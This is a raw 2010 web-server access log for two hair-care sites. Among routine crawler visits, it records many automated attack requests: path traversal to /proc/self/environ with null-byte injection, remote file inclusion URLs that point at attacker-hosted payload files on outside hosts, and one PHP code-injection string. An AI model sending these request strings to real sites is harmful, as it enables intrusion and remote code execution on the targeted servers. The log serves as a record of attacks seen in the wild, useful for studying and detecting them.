91.121.10.96 - - [24/May/2010:17:09:35 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:17:09:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.10.96 - - [24/May/2010:17:09:36 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:10:36 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:10:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:10:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:17:11:36 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
74.55.224.242 - - [24/May/2010:17:12:24 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:17:12:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:17:12:24 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:17:12:31 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:17:12:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.10.96 - - [24/May/2010:17:12:32 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.247.177.18 - - [24/May/2010:17:13:45 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:17:16:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14971 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:17:16:12 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:17:16:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.55.224.242 - - [24/May/2010:17:16:12 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.115.182.20 - - [24/May/2010:17:23:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "growlonghairfast.com"
188.115.182.20 - - [24/May/2010:17:23:41 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "growlonghairfast.com"
188.115.182.20 - - [24/May/2010:17:23:42 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "growlonghairfast.com"
38.105.71.72 - - [24/May/2010:17:28:02 -0700] "GET /logs/access.log HTTP/1.0" 200 463166 "http://www.google.com/search?hl=en&source=hp&q=www.freehairsecrets.com/logs/access.log&aq=f&oq=&aqi=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:17:28:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4518 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:17:31:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12881 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
62.44.82.61 - - [24/May/2010:17:31:55 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:17:31:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:17:31:55 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:17:32:10 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [24/May/2010:17:32:10 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [24/May/2010:17:32:10 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [24/May/2010:17:32:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:17:32:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [24/May/2010:17:32:54 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:17:38:19 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:17:38:19 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
64.22.67.37 - - [24/May/2010:17:39:48 -0700] "GET /logs///skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [24/May/2010:17:39:48 -0700] "GET //skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [24/May/2010:17:39:48 -0700] "GET /logs/access.log%20%20///skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [24/May/2010:17:40:32 -0700] "GET //skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [24/May/2010:17:40:32 -0700] "GET /logs/access.log///skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [24/May/2010:17:40:32 -0700] "GET /logs///skin/board/moviefl//download.php?board_skin_path=http://lasvegas.encorepresents.net/sc2? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.148 - - [24/May/2010:17:43:31 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:17:43:31 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:17:43:31 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:17:43:32 -0700] "GET /logs/access_100503.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:17:47:01 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:17:47:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:17:47:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:17:48:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6479 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:17:52:14 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:17:59:05 -0700] "GET /logs/access.log//admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:17:59:05 -0700] "GET /admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:17:59:05 -0700] "GET /logs//admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:17:59:45 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5038 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:01:39 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.9.14.148 - - [24/May/2010:18:02:13 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:18:02:14 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:18:02:14 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:18:02:14 -0700] "GET /logs/access_100426.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:07:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:16:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14529 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:18:20:06 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:22:09 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:22:12 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:22:49 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:18:22:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:23:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:23:09 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:18:24:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:26:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4827 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:26:29 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:26:30 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:26:30 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:18:26:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.106.37.197 - - [24/May/2010:18:27:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
208.80.193.42 - - [24/May/2010:18:27:28 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Hotel; .NET CLR 1.1.4322; .NET CLR 1.0.3705; InfoPath.1; Hotel; .NET CLR 2.0.50727; Hotel)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:18:27:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4788 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:18:30:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
174.133.204.130 - - [24/May/2010:18:34:58 -0700] "GET /logs/access_100503.log%20%20/index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [24/May/2010:18:34:58 -0700] "GET /index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [24/May/2010:18:34:58 -0700] "GET /logs/index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:35:11 -0700] "GET /logs/access_100125.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:35:11 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:35:12 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:18:35:32 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:18:35:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:18:35:32 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:38 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:38 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:52 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:35:52 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:35:54 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:00 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:36:00 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:36:00 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:36:01 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:36:03 -0700] "GET /logs/access_100503.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
